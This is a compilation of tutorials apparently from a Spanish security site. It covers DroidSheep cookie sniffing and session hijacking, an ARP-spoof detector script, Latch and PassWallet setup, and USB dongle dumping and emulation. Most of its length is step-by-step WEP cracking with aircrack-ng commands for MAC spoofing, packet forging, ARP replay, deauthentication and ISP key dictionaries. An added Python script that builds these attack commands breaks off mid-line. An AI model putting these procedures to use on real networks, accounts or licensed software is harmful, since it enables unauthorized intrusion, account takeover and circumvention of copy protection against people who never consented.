Category: Computer Security

How to sniff network connections with DroidSheep

We introduce DroidSheep, an application used to sniff network connections and capture data such as the usernames and passwords of certain services.

Spying on someone else’s network connections without authorization is illegal as well as unethical, so use this information at your own risk; after all, human knowledge belongs to the world.

At RedesZone.net we have already talked about DroidSheep (DroidSheep, an application for Android phones that allows you to steal passwords). This time we have tested it and want to show you how it works.

We will also show you how DroidSheep Guard works, an application that detects whether someone is doing ARP spoofing with DroidSheep or another application, perfect for protecting us from prying eyes.

Tutorial on how to use DroidSheep

DroidSheep is a sniffer that searches the network it is connected to for the login cookies of different websites, such as Facebook, Tuenti, Google, Amazon, LinkedIn, YouTube and several more. To protect ourselves against it, we first need to know how it works.

Its main mode of operation is ARP spoofing on encrypted networks, or simply listening for login cookies on open networks.

The developers stopped supporting the application some time ago for legal reasons, as indicated on their website, but the .apk installer can still be found on the internet. The latest official version is v14 and it requires root.

Link to version v14 tested by RedesZone

There are fake versions claiming to be v15 or higher, but they are just that, fakes, as the DroidSheep developers explained on their official Twitter account.

Once installed, the application creates a launcher icon in the applications menu, from which we run the program. The first thing we see is a screen with a legal notice, which must be accepted to continue using the program. After accepting it, we arrive at the program’s main screen.

Here we see two options at the bottom: one labelled “ARP-spoofing” and another called “Generic mode”.

ARP spoofing must be used on networks protected with a WPA/WPA2 key for the attack to succeed, but it makes us detectable to any sniffing-detection program. If we deactivate this option we are undetectable, but it only works on open networks or networks with WEP encryption.

Generic mode captures all login cookies instead of only those of certain predefined websites, greatly increasing the number of websites that can be impersonated.

Once we have selected the options we want, we click the Start button and the program begins searching for website cookies travelling through our local network. When such traffic occurs, the program captures it and lists the results in its main window.

Once sites have been captured, we can click on them and a menu appears with various options, such as opening the site while impersonating the user, or saving the cookies.

Clicking on open site opens an integrated web browser that loads the selected website with the session data of the person whose cookies we captured.

We can also add results to a blacklist so that they do not appear in future searches, or remove results from the list.

On the DroidSheep website there are some demonstration videos of how the program works.

Tutorial on how to use DroidSheep Guard

Now we are going to show you how to detect an ARP spoofing attack with an Android phone or tablet, and prevent the access data of our Facebook, Tuenti, Amazon and similar accounts from being stolen.

As we saw in the DroidSheep tutorial, it is very easy to perform ARP spoofing from an Android device and steal cookies containing the login data of our social networks or, worse, of online shopping sites such as Amazon, or of our e-mail.

To prevent this, the creators of DroidSheep have built another application called DroidSheep Guard, which continuously reviews the ARP table of the router we are connected to and raises a warning when it detects any unusual change in it.

DroidSheep Guard is available for free on the Play Store. Once downloaded, we run it by tapping the icon created in the applications menu.

The first thing we see on the main screen is a slider where we set how often the program checks the ARP table. The normal, default setting is 60 times per minute, i.e. once per second, but to avoid excessive battery consumption we can set it to once every 2 seconds, which is also effective.

We also have 3 options below that bar.

“Autostart / stop depending WiFi”: lets the program choose on which networks to activate and on which not. Normally it is activated on public networks and deactivated on private networks.

“Disable WiFi on alert”: when the program detects a threat, it automatically deactivates Wi-Fi. We recommend enabling it.

“Show status icon in notification bar”: Shows an icon in the notification bar with the status of the program.

We click the «Start protection» button and the application status changes to «running». At the bottom it shows us the IP and MAC address of our router’s gateway.

As long as there is no intrusion, the program keeps checking the ARP table constantly. If we suffer ARP spoofing, the program automatically notifies us with a warning window.

In this window we can choose whether to open DroidSheep Guard, ignore the warning (not recommended) or deactivate Wi-Fi, if we do not have the automatic option enabled.

With this program we can prevent our e-mail accounts from being stolen through a “man in the middle” attack.

To stop monitoring the ARP table, we click the “Stop protection” button in DroidSheep Guard and it stops monitoring the table.
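DroidSheep Guard’s check boils down to polling the ARP table and comparing the gateway’s hardware address with the one learned when protection started. The Python script below is an added example of that detection logic written for this page; it is not DroidSheep Guard’s own code. It reads /proc/net/arp (the Linux format, which is what an Android device exposes), but the two snapshots embedded in it are constructed sample data so it runs offline; the gateway IP 192.168.1.1 and all MAC addresses are assumptions.

```python
"""ARP-table watcher in the spirit of DroidSheep Guard (added example, not the app's code).

Two conditions raise an alert: the gateway's MAC changes after it was first learned,
or another host starts answering with the gateway's MAC (the classic spoof symptom).
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed /proc/net/arp snapshots (columns: IP, HW type, Flags, HW address, Mask, Device).
ARP_BASELINE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:01     *        wlan0
192.168.1.20     0x1         0x2         aa:bb:cc:00:00:20     *        wlan0
"""

# Later snapshot: the gateway entry now carries the MAC of 192.168.1.20 (assumed spoofer).
ARP_SPOOFED = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:20     *        wlan0
192.168.1.20     0x1         0x2         aa:bb:cc:00:00:20     *        wlan0
"""


def parse_arp_table(text: str) -> Dict[str, str]:
    """Return {ip: mac} for complete entries (flag 0x2); the header line is skipped."""
    table: Dict[str, str] = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3].lower()
        if int(flags, 16) & 0x2 and mac != "00:00:00:00:00:00":
            table[ip] = mac
    return table


@dataclass
class GatewayWatch:
    gateway_ip: str
    gateway_mac: Optional[str] = None  # learned from the first snapshot (trust on first use)
    alerts: List[str] = field(default_factory=list)

    def check(self, snapshot_text: str) -> List[str]:
        """Compare one ARP snapshot against the learned gateway MAC; return new alerts."""
        table = parse_arp_table(snapshot_text)
        new_alerts: List[str] = []
        mac = table.get(self.gateway_ip)
        if mac is None:
            return new_alerts  # entry expired or not yet resolved; nothing to compare
        if self.gateway_mac is None:
            self.gateway_mac = mac
        elif mac != self.gateway_mac:
            new_alerts.append(
                f"gateway {self.gateway_ip} MAC changed {self.gateway_mac} -> {mac}")
        # A second IP carrying the gateway's MAC means another host answers for it.
        for ip, other_mac in table.items():
            if ip != self.gateway_ip and other_mac == mac:
                new_alerts.append(f"{ip} shares MAC {other_mac} with gateway {self.gateway_ip}")
        self.alerts.extend(new_alerts)
        return new_alerts


def read_arp_cache(path: str = "/proc/net/arp") -> str:
    """Read the live ARP cache; on a real device, call watch.check(read_arp_cache()) on a timer."""
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    watch = GatewayWatch("192.168.1.1")
    print(watch.check(ARP_BASELINE))  # first snapshot only learns the MAC: []
    print(watch.check(ARP_SPOOFED))   # two alerts
```

The baseline is trust-on-first-use: if the spoof is already in place when protection starts, the poisoned MAC is what gets learned, which is why the app shows the gateway MAC at start so it can be compared with the value seen on a trusted connection.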


How to register and start using Latch

In this manual we will help you register a developer account in Latch and start using Latch with our main services.

Before starting, we recommend reading this section, where we detail what Latch is and the possibilities it offers: to administrators who want to protect their servers, to administrators who want to give their users extra security, and to users themselves who want additional security when using a critical service such as banking.

Register in Latch as a developer

The first thing to do is go to the official Latch website and register as a developer; this gives us access to the tools needed to integrate this additional security layer into our server and offer users extra security.

Registration is completely free and is required to start using the system.

Once registered as a developer, we log in with our credentials on the website and enter the development section, where we can add new applications to our account.

Starting to create an application with Latch

On the left side of the web page we have “My Applications”; in this section we manage our applications: we can create, edit and delete them. First, click “Add a new application”, as you can see in the following screenshot:

Then we just indicate the name we want our application to have and click add application, as shown here. We have called the application “OpenSSH-RedesZone”.

Once we click add application, we are taken to the menu where we edit the application’s information. The most important parts are the application ID and the secret key, which we will use later when configuring the service. Latch allows us to select an image instead of the default one, so we can quickly tell the different services apart.

In some services we can select a second authentication factor, an OTP (One Time Password) key, where we are asked for the randomly generated code shown on the mobile device. This way, when logging in to the service or to our server, after being asked for the username and password (or using a private key), we are asked for this additional password. Note that with OpenVPN, for example, we cannot use OTP because of the OpenVPN architecture, but with OpenSSH and other services we can, and we recommend enabling it.

At the bottom we enter the administrator’s contact information, which is shown in the alerts the end user receives. This data is optional, so we can choose not to enter it, although it is advisable to put at least one contact e-mail.

Once we have configured the application to our liking, we click save changes and return to the main applications menu, where all the ones we have created are listed. From here we can edit the application, delete it and also access the control panel.

Latch control panel

The control panel shows us very important data such as the number of users paired with the service, the access attempts that have been blocked, etc.

Once we have created our application, we only have to implement the functionality in our service, be it WordPress, OpenSSH, OpenVPN or any other compatible one.

In the Latch section you can find detailed manuals on how to configure it with various services.

Manage and protect your passwords on Android with PassWallet

We use our smartphones more and more, and with this grows the confidence with which we store our data on them. To prevent such data from falling into the wrong hands we should use an application that protects, encrypts and hides it.

To protect our passwords from third parties we can use an application called PassWallet.

PassWallet offers us the following features:

  • Stealth (hidden) mode that hides the application from the application list.
  • Custom templates that make it easy to add credit cards, documents, websites and more.
  • Floating window function that allows us to easily interact with other applications.
  • Synchronization with Google Drive and Dropbox.
  • Password generator.
  • Self-destruct option.
  • Encrypted data can only be opened with the application.

PassWallet is available on the Play Store as a free 30-day trial. If it convinces us, we can buy it on the Play Store for €4.

Once downloaded and installed on our Android device, we run it. First it asks us to create a master password to access the program. The password must be between 4 and 12 characters long.

Once the password is entered, we must specify a secret question and answer to recover that password.

Once configured, we see the program. It first asks whether we want to configure a server to store our data in the cloud. We click “yes” (if we want cloud storage) and choose which server to use.

We authenticate to the server and go back.


We can already see the main window of the application.


Let’s first take a quick look at the options. To access them we tap the button with three dots at the top right of the screen, or open the settings menu, depending on our device.

In the Passwords section we can choose whether to hide our password and set the length of the passwords produced by the password generator. Here we can also change our master password and the secret question/answer.

In the Security section we can activate the program’s hidden mode so that it does not appear in the application list. To access it we must enter an asterisk (*) followed by our master password. We can also activate self-deletion of the data after a certain number of failed access attempts.

In Data Management we can manage our account in the cloud, as well as import and export the files.

Back in the main window of the application we see several example accounts that come with the application.

To add a new account, tap the + button at the top right of the screen. Several templates appear depending on the type of data we want to save: web, bank details, mail, premium accounts, etc.

We create a new web account and fill in the fields shown on screen: username, password, link to the website, etc.

We tap the tick at the top right to save the entry.

It will now appear listed on the main screen.


In the same way we can store any data securely in the system.

How to Backup a Dongle

WARNING: the process of copying a USB dongle can damage the device. Work with extreme caution.

Companies have always been concerned about protecting their software against hackers. Many strategies have been used, with varying success. These strategies had a downside for the user: they often involved unreliable devices, such as key disks, which could be lost, broken or damaged, making the program unusable and losing productivity.

Nowadays the very fragile key disks have been replaced by USB dongles. What is a dongle?

“A small hardware device that connects to a computer, usually to authenticate a piece of software. When the hardware device, usually called a dongle, is not connected, said software runs in a restricted mode or it doesn’t run at all. This type of device is frequently used in very expensive programs and in niche software, such as CAD applications, hospital management or digital printing.”
Source: Wikipedia

OBJECTIVE:

In this manual we will see how to make backup copies of those hardware devices, from now on called dongles, so that in case of breakage, loss or damage you can continue working without having to wait for the vendor to supply another.

REQUIREMENTS:

The instructions in this manual were tested on Windows XP with SP2 and SP3. With other operating systems, such as Windows Vista Business, I got several blue screens that made me abandon the test.

TOOLS:

– The dongle, of course. It can be any that I know of, but it is quite possible that some manufacturers have implemented security measures to prevent copying, for fear of the accompanying software being hacked.

Be VERY sure of the type of dongle you are going to back up, since each brand needs a different emulator and perhaps a different dump.

– Emulation program. I have used Sentemul. This software is paid, and I am not aware of any free one. Even if one exists, you must work with great care, since the process of backing up a dongle can damage it, as can the emulation process.

– Program to dump the dongle. Be careful not to use the wrong dumping software; you can damage the dongle.
In this manual I have used a program called neobit11.exe, from neobit.org.

You can download it from here: Download Neobit11

– The appropriate drivers for your dongle. For example, if it is a Sentinel, you will need the Sentinel drivers.

THE PROCESS:

The steps we must follow are:
– Dump the dongle.
– Emulate that copy, in case of loss, theft or failure of the original.

DONGLE DUMP

Dumping the dongle is one of the critical points of the process and can be quite risky. The first thing to be clear about is the brand of the dongle you are going to back up, so as to do it correctly.
In our case it was tested with a Sentinel, so the Sentinel drivers were installed. If they were not installed, the program would give an error. I cannot specify the drivers exactly, because they change over time and with each version.
Here is what the neobit11 program looks like:

You can see several tabs. The last three correspond to the brand of the dongle. The keygen tab is for other kinds of work that are outside the scope of this manual.

Since our original dongle is a Sentinel, we go to the Sentinel tab.
We see several options; the two labelled Specify Developer Id and Specify Write Password do not interest us, since they are for somewhat more advanced users.

The first, Specify Developer Id, is for making a copy of a copy, without needing the original dongle.

The second, Specify Write Password, only tries to make the process faster (which sometimes, depending on the type of dongle, can take forever).

In our case we limit ourselves to specifying a name for our dongle in the Dump and Solve text box, as the image indicates.

The name is arbitrary; you can put whatever you want, but it must end in .dng. I have chosen adslzone as the name.

Remember: the correct drivers must be properly installed before pressing the Dump & Solve button. Otherwise an error is produced, with text such as “Can’t find dongle” or “error initializing Sentinel API”, apart from other errors arising from any other failure of the program.

BEFORE YOU PRESS DUMP & SOLVE: it is advisable not to perform this operation on a desktop computer without a UPS. Ideally, use a laptop connected to the mains with a fully charged battery.

Once the Dump & Solve button is pressed, the process will begin, which has several phases:

1. Find the dongle. If the dongle is correctly connected to a working USB port, this step should not give any error. If an error does occur, simply close the program, move the dongle to another port and run it again.

2. Detect the algorithms and decrypt them. This is the most time-consuming step. Depending on the dongle, it can take several hours, reaching 5 or 6 hours in some cases I have handled.

3. Create the dump file, the .dng. This is the file we will later use in the emulator.

During each of these steps the progress bar fills gradually. The progress bar is the one visible in the image, pointed at by the red arrow.

Each of the steps can fail and produce specific errors. In my case only two errors appeared: “can’t find dongle” and “error initializing Sentinel API”. The first happens when the program cannot find the dongle in any way, and the second is due to incorrectly installed or disabled drivers, or because the driver service is not running. (Remember that it was recommended to install the drivers as a service that runs when Windows starts.)

When the process finishes, you have created the dongle backup file, ready to be emulated when you need it. That is the next part of the manual.

If any error occurs, it will appear in the program’s Log window.


EMULATION OF THE .DNG FILE

For this part we use the Sentinel Emulator program, which can be downloaded from this link.

This program uses a .dng dump file to emulate the behaviour of the dongle the file belongs to. Its operation is not complicated at all; however, it can cause blue screens with some programs. In my case, simple Bluetooth programs caused blue screens when running alongside the emulator.

Let’s see an overview of the program.


We see 3 tabs, each with a specific function.

The Emulator tab is used to emulate the dongle; it starts and stops the service.

The Dongles tab is where we load the file dumped in the previous steps.

The Driver tab is where we install the driver the program needs to work, and it is where we should go first.

As you can see, there are 2 options, manual start and automatic start. The first thing to do is click the Install Driver button; once pressed, the two options are enabled. I advise manual start: that way, if there is a failure, the program does not run at startup, which could cause problems if two conflicting programs run as Windows services.

When we have decided which type of start we want, we click Save state and it is saved.

Once this is done, we go to the Emulator tab.


This tab is where the dongle is emulated. We see several options:
License: the program’s license. This is where you enter the license for the program.
Licensed Dongles: the license of the dongle to be emulated.
Computer ID: the computer’s ID.

Now we press the Start Service button to run the service. When pressed, we see this:

The program status has changed; it reports that the service is now running.
Now we go to the Dongles tab to load the dump file, the .dng from the previous steps.

We click Load Dump and choose the file to load; in our case we called it adslzone.dng.

Once loaded, we return to the Emulator tab to check that the file has been loaded and is working correctly. Something similar to this should appear:

I have omitted the License, Licensed Dongle and Computer ID section, as it is private data.

Once this appears, the dongle is emulated and working 100%. This way the company no longer has to stand still and lose productivity while a new dongle is delivered.

How to hack a WiFi network without connected clients

This manual is aimed at generating traffic when there is no client associated with the access point (Wi-Fi network), since with no clients there is no traffic. It is an attack that, once done, generates a lot of traffic, but it does not always work with all Wi-Fi networks. With that clarified, we can begin (I have used Wifiway 1.0 Final).

You can download it from the official website.

Change the MAC of our wireless card:

We open a terminal and type:

macchanger -m DESIRED_MAC [interface]

Example:

macchanger -m 00:01:02:03:04:05 wlan0

We put the card in monitor mode to be able to capture packets.

As we said in the previous manual…

airmon-ng start [interface]

Example:

airmon-ng start wlan0

We open airodump to note the channel, BSSID and SSID

We open airodump-ng from Start / Wireless / suite / airodump-ng and see all the Wi-Fi networks around us; we note the channel used by the network we want to audit, as well as its BSSID and SSID.

Now we open a console (or terminal) and type:

airodump-ng -c CHANNEL --bssid BSSID -w CAPTURE_NAME [interface]

Example:

airodump-ng -c 3 --bssid 00:02:CF:43:23 -w capture wlan0

We leave this terminal open until the end, do not close it.

We associate with the Wi-Fi network (fake association)

Now we associate with the AP using the spoofed MAC we set earlier.

aireplay-ng -1 10 -e SSID -a BSSID -h OUR_FAKE_MAC [interface]

Example:

aireplay-ng -1 10 -e Gorrion -a 00:02:CF:13:41 -h 00:01:02:03:04:05 wlan0

We leave this console open, like the airodump one; DO NOT CLOSE THEM!

We launch the chop-chop attack

Now we launch this attack to obtain a WEP packet.

We open a console and type:

aireplay-ng -4 -h OUR_FAKE_MAC [interface]

It asks whether we want the WEP packet it has captured; we check that the BSSID shown is the same as the one we selected, and if so we enter [y] and press Enter. The process then begins (it takes approximately 1 minute); when it finishes it creates two files in /root, one with a .cap extension and the other with a .xor extension.

Do not close the console, because if you do you will pull your hair out…

Find the IP of the Wi-Fi network

Now we find out what IP our Wi-Fi network uses; if we already know it is the usual one (192.168.1.1) we can skip this step.

tcpdump -s 0 -n -e -r CAP_FILE

Since the name of the .cap file is so long, we copy it from the previous console and paste it here. We press Enter and a lot of output appears, but you will easily identify the IP of the Wi-Fi network.

Forge an ARP packet to inject

We build an ARP packet with the AP’s data and ours, to inject it later with aireplay.

packetforge-ng -0 -a BSSID -h OUR_FAKE_MAC -k AP_IP -l IP_IN_RANGE -y FILE.XOR (copy and paste from the terminal opened before) -w PACKET_NAME

Example:

packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k 192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w packet

Injection of the forged ARP packet

We inject the forged ARP packet to obtain IVs:

aireplay-ng -2 -x 1024 -h OUR_FAKE_MAC -r FORGED_ARP_FILE [interface]

We press Enter; it asks whether we want to use the packet, we enter [y] and press Enter to confirm.

Example:

aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r packet wlan0

In the screenshot you can see 300 instead of 1024; that is because some APs do not support so much traffic and get saturated. I would start with 300 and go up in steps of 300 until reaching the maximum (1024); in this case I went with 1024 and had no problem.

Wait until there are enough IVs

Now we wait until #Data on the airodump screen (the one we have NOT closed) reaches a decent number.

Since it rises fast and waiting costs nothing, I would leave it until we reach a million (to be sure that aircrack can recover the key).

We run Aircrack-ng to get the key

Now we run aircrack to get the key; we open another console and type:

aircrack-ng capture-01.cap

Use the capture name you gave to airodump earlier; if you do not remember it or have closed it, go to /root, where you will see the .cap file; note its name and use it.

In a few minutes you will have the key.

Look at the difference in IVs in such a short time: in 8 minutes we have captured more than 250,000 IVs.

When there ARE connected clients: no chop-chop

If the Wi-Fi network has an associated client, it is best to re-inject ARP packets; it is the same as chop-chop but without the effort of forging the packet, etc.

Re-injection of ARP packets:

aireplay-ng -3 -b BSSID -h ASSOCIATED_CLIENT_MAC [interface]

Example:

aireplay-ng -3 -b 00:02:CF:69:69 -h 00:02:CE:11:11 wlan0

It is not necessarily instantaneous; wait a bit, about 4 or 5 minutes is more than enough. As before, sometimes this type of attack does not work with certain access points or Wi-Fi networks.

Last comments on this manual

Good luck with this method of generating traffic, since sometimes it does not work the first time, and it does not always work at all… it depends on the access point.

If aircrack has not been able to get the key with a million IVs (unlikely), wait until it reaches a million and a half and it will (and if it still does not, post in the forum so we can see what is happening).

With this we finish the wireless audit of WEP encryption. I hope it has been useful and, above all, that you have had as much fun as we did.

How to hack a WiFi network with WEP encryption

Before starting the tutorial, note that the plain text is the steps, the italics are clarifications about what each thing is, and the bold is attacks to generate traffic (not necessary if there is a lot of traffic from the start).

We download the distribution for the wireless audit, WiFiSlax or WiFiWay, from their official web pages.

The MD5 of this file is 911dc29262ee117e5e27770067bd2e71, so you can check that it downloaded correctly.

Here you have the program to check it:

Download MD5 Verify Free
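The page delegates the checksum step to an external tool. As an added example, not code from the page or from the distribution’s authors, the following Python script does the same check without one: it digests the file in chunks (so a large ISO is never loaded into memory at once) and compares the result with the published value in constant time. The published WiFiSlax MD5 is taken from the page; the sample file content and the helper names are constructed for the example.

```python
"""Verify a downloaded image against its published checksum (added example).

Usage: python verify_download.py <file> <expected-hex> [algorithm]
Without arguments it runs demo() on a constructed temporary file.
"""
import hashlib
import hmac
import os
import sys
import tempfile

# Checksum published on the page for the WiFiSlax image.
WIFISLAX_MD5 = "911dc29262ee117e5e27770067bd2e71"


def file_digest(path: str, algorithm: str = "md5", chunk_size: int = 1 << 20) -> str:
    """Return the hex digest of the file, reading it in chunk_size pieces."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_file(path: str, expected_hex: str, algorithm: str = "md5") -> bool:
    """True when the file's digest equals expected_hex (case and surrounding whitespace ignored)."""
    expected = expected_hex.strip().lower()
    actual = file_digest(path, algorithm)
    # compare_digest does not short-circuit on the first differing character.
    return hmac.compare_digest(actual, expected)


def demo() -> tuple:
    """Self-contained check on a constructed file: (good match, wrong digest, uppercase match)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "wifislax-sample.iso")
        content = b"constructed sample content, not a real ISO\n" * 1000
        with open(path, "wb") as f:
            f.write(content)
        good = hashlib.md5(content).hexdigest()
        return (
            verify_file(path, good),
            verify_file(path, WIFISLAX_MD5),          # the page's value cannot match the sample
            verify_file(path, " " + good.upper() + "\n"),
        )


if __name__ == "__main__":
    if len(sys.argv) >= 3:
        algorithm = sys.argv[3] if len(sys.argv) > 3 else "md5"
        ok = verify_file(sys.argv[1], sys.argv[2], algorithm)
        print("OK" if ok else "MISMATCH")
        sys.exit(0 if ok else 1)
    print(demo())  # (True, False, True)
```

A matching MD5 confirms the download was not corrupted in transit; because MD5 is no longer collision-resistant, it does not by itself prove the image is the one the authors built unless the digest was obtained from a source you trust, so pass "sha256" as the algorithm whenever the publisher offers one.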

Once downloaded, we burn it to a CD, configure the BIOS to boot from CD and insert the CD.

We follow the instructions that come with the distribution. If by chance it does not work and your computer freezes at startup, choose OPTION 2 at the start; in theory it should work (I use option 2 since option 1 does not work for me, because of the laptop’s graphics card).

I hope you have a wireless card compatible with MONITOR MODE, because otherwise we cannot do anything.

If you don’t know if your card is compatible with MONITOR MODE, look at this link:

List of wireless cards for wireless auditing

Are you ready? Here we go…

Let’s see what our wireless card is called in Linux: we go to the Shell, type iwconfig and press Enter; there we see the names of our cards. In my case wlan0 corresponds to the USB adapter.

We put the card in MONITOR MODE: we go to the Shell (on the desktop), type airmon-ng start wlan0 and press Enter. It takes a moment to load and then reports monitor mode enabled. We have everything ready!

Note: if you do not do this, the card CANNOT be put in monitor mode.

Another way to put it in monitor mode is: iwconfig wlan0 mode monitor, then press Enter.

To check that it has actually been put into monitor mode, just type iwconfig wlan0 and press Enter.

Now we capture absolutely all the packets in the air, which is necessary to carry out the audit successfully: not only those of a certain channel or SSID, ALL of them!

We go to Home / Wifislax / Current Suite / airodump-ng and open it. It asks us for a card, we enter ours (wlan0) and the name of the capture (by default capture; later it will be called capture-01.cap), we click apply and it tells us where it is saved. Now we see what is out there: what packets there are, who they are sent to, the channel used, etc.

After 5 minutes (or however long you want to wait) we go to Home / Wifislax / Current Suite / aircrack-ng and run it; we open the .cap (created by airodump) and see the IVs we have captured, just to LOOK (these are the packets that are really useful; the rest shown in airodump are not valid for this), although airodump also shows the count under #Data.

If our network is not Telefónica (WLAN_XX) or Jazztel (Jazztel_XX) or another with a dictionary, we will need more than 400,000 IVs to get the key. If it is a WLAN_XX or Jazztel_XX and you have more than 4 IVs (the more the better) we can manage it.

Important note: if we only want airodump to collect initialization vectors (IVs), we type: airodump-ng --ivs -w capture wlan0. The file will be in /root/.

Before continuing, let’s clarify concepts:
BSSID = the MAC of our router
SSID = the name of our router’s Wi-Fi network
STATION = the MAC of the client Wi-Fi card (that is, the connected user).

For WLAN_XX or Jazztel_XX we continue with the following process:

We generate the WLAN dictionary included in the distribution; we go to the SHELL and type:

wlandecrypter BSSID SSID keys.txt

We press Enter and a text file is saved in /root/.

Now we have the WLAN_XX dictionary. We go to where airodump saved the capture, press CTRL+C in airodump to stop it, and move the capture-01.cap file to /root/, where keys.txt is.

We type the following in Shell:

aircrack-ng -b BSSID -w keys.txt capture-01.cap

keys.txt is what we gave to wlandecrypter, and capture-01.cap is what we gave to airodump.

Recovering the key takes very little time (under 5 seconds if everything is in order). Remember that the key to use is the one shown as ASCII at the bottom left of the output (it is not shown in the screenshot).


All of this assumes optimal conditions, with traffic flowing on the network.

If there is not enough traffic we can generate it.

First, an ARP request replay attack (attack -3), which produces a lot of traffic and therefore new IVs:

aireplay-ng -3 -b BSSID -h STATION wlan0

STATION is the MAC of the connected client's card, which is used as the source address of the replayed frames.

Second, a deauthentication attack (attack -0), which "cuts" the connected client's session so that the client and the router reconnect; the reconnection generates ARP traffic that the replay attack above captures and reinjects.

The command is as follows:

aireplay-ng -0 50 -a BSSID -c STATION wlan0


The 50 is the number of deauthentication frames to send. Once the client has been deauthenticated and reconnects, it sends ARP packets that the previous attack picks up. Do not keep deauthenticating continuously: a client that is being kicked off all the time never reconnects and never sends ARP packets, so leaving it running all night achieves nothing. This is a delicate job that takes time.

To generate traffic on a network with no connected client, the only option is a chop-chop attack. It does not always work, but there is no harm in trying.

Now suppose our router is a Jazztel router.

The routers that Jazztel ships with the key printed on a sticker are no longer safe. The same thing has happened as with WLAN_XX: in 10 minutes it is done. Here is what to do:

Download the Wifiway 1.0 Final:

Download WiFiWay 1.0 Final Free

The MD5 of this file is 2fac135cad7b185706bbcb9c51f45932; as with Wifislax, check it (for example with md5sum) before burning the image. Note that a hash published next to the download only detects a corrupted transfer, not a file that was tampered with at the source.

Boot it following the on-screen instructions; nothing needs to be changed, it starts on its own.

The process to audit a Jazztel_XX is the same as for WLAN_XX; the only difference is the command used to generate the dictionary:

jazzteldecrypter BSSID SSID keys.txt

Everything before and after this step is the same as for WLAN_XX.

NOTE: Wifiway can also do everything described above for Wifislax.
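The decisions in the steps above (dictionary route for WLAN_XX / Jazztel_XX, the 400,000-IV rule of thumb for other WEP networks, and which connected station to feed to aireplay-ng) can be made from the CSV file that airodump-ng writes next to capture-01.cap. The following script is an added example, not part of the original manual or of the aircrack-ng suite: it parses that CSV layout and prints, per network, which route applies and the exact commands from the manual with the BSSID, ESSID and station filled in. The sample rows are constructed, not a real capture, and the interface and capture file names are assumptions.

```python
# Added example (not from the original manual or aircrack-ng): triage an
# airodump-ng CSV export for the WEP audit steps described above. The CSV
# layout is the one airodump-ng writes alongside capture-01.cap; the rows in
# SAMPLE_CSV are constructed for this example, not a real capture.
import csv
import io
import re

IV_THRESHOLD = 400_000   # IVs the manual quotes for a non-dictionary WEP key
MIN_IVS_DICT = 4         # IVs the manual says suffice to test the ISP dictionary
ISP_SSID = re.compile(r"^(WLAN|JAZZTEL)_[0-9A-F]{2}$", re.IGNORECASE)
MAC = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$", re.IGNORECASE)

SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1A:2B:3C:4D:5E, 2013-05-01 10:00:00, 2013-05-01 10:07:12,  6,  54, WEP , WEP, OPN, -41,  812,   4127,   0.  0.  0.  0,   7, WLAN_3C,
00:1F:A4:11:22:33, 2013-05-01 10:00:03, 2013-05-01 10:07:10, 11,  54, WEP , WEP, OPN, -63,  790,  12050,   0.  0.  0.  0,   9, MiRedCasa,
00:26:5E:77:88:99, 2013-05-01 10:00:05, 2013-05-01 10:07:11,  1,  54, WPA2, CCMP, PSK, -70,  640,      0,   0.  0.  0.  0,  10, JAZZTEL_7F,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AC:DE:48:00:11:22, 2013-05-01 10:00:20, 2013-05-01 10:07:00, -48,   3211, 00:1A:2B:3C:4D:5E,
AC:DE:48:33:44:55, 2013-05-01 10:01:00, 2013-05-01 10:06:30, -60,     17, (not associated), WLAN_3C
"""


def parse_airodump_csv(text):
    """Split the export into its two tables: access points and stations."""
    aps, stations, section = [], [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue                      # blank separator lines
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            # ESSIDs containing commas would need the .kismet.netxml export instead
            aps.append({"bssid": row[0].upper(), "channel": int(row[3]),
                        "privacy": row[5].strip(), "ivs": int(row[10]),
                        "essid": row[13].strip()})
        elif section == "sta" and len(row) >= 6:
            stations.append({"mac": row[0].upper(), "packets": int(row[4]),
                             "bssid": row[5].strip().upper()})
    return aps, stations


def triage(aps, stations, iface="wlan0", capture="capture-01.cap"):
    """One plan per network: the route to take plus the manual's commands."""
    clients = {}
    for sta in stations:
        if MAC.match(sta["bssid"]):       # drops "(not associated)" probers
            clients.setdefault(sta["bssid"], []).append(sta)
    plans = []
    for ap in aps:
        bssid, essid = ap["bssid"], ap["essid"]
        best = max(clients.get(bssid, []), key=lambda s: s["packets"], default=None)
        plan = {"bssid": bssid, "essid": essid, "ivs": ap["ivs"],
                "station": best["mac"] if best else None, "commands": []}
        if ap["privacy"] != "WEP":
            plan["route"] = "skip"        # these steps only apply to WEP
        elif ISP_SSID.match(essid) and ap["ivs"] >= MIN_IVS_DICT:
            tool = "wlandecrypter" if essid.upper().startswith("WLAN") else "jazzteldecrypter"
            plan["route"] = "dictionary"
            plan["commands"] = [f"{tool} {bssid} {essid} keys.txt",
                                f"aircrack-ng -b {bssid} -w keys.txt {capture}"]
        elif ap["ivs"] >= IV_THRESHOLD:
            plan["route"] = "statistical"
            plan["commands"] = [f"aircrack-ng -b {bssid} {capture}"]
        else:
            plan["route"] = "collect"
            needed = MIN_IVS_DICT if ISP_SSID.match(essid) else IV_THRESHOLD
            plan["ivs_needed"] = needed - ap["ivs"]
            if best:   # replay the client's ARP requests; kick it briefly if traffic is low
                plan["commands"] = [f"aireplay-ng -3 -b {bssid} -h {best['mac']} {iface}",
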